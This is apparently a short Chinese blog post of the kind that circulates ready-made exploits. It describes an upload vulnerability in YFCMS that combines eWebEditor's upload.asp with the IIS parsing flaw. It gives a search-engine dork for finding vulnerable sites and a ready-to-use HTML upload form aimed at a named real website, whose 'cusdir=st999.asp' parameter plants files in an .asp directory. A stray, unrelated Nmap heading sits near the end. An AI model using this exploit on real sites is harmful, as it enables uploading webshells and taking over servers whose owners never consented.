YFCMS之ewebeditor上传漏洞

作者：hack1990 时间：11-08-20 阅读数：1157人阅读

漏洞是利用ewebeditor的上传结合IIS解析漏洞

FROM HTTP://WWW.ST999.CN/BLOG BY 流浪的风

google关键字：intext:版权所有:yfcms

利用文件：admin\WebEditor\asp\upload.asp

利用代码：

<form action="http://www.st999.cn/admin/WebEditor\asp\upload.asp?action=save&type=image&style=popup&cusdir=st999.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

这里有个前提，要知道网站的后台目录才行

# Nmap Security Scanner 7.0

上一篇：旅游酒店系统一个ODAY

下一篇：马克斯CMS(Maxcms) admin_inc.asp SQL注入漏洞

相关文章

发表评论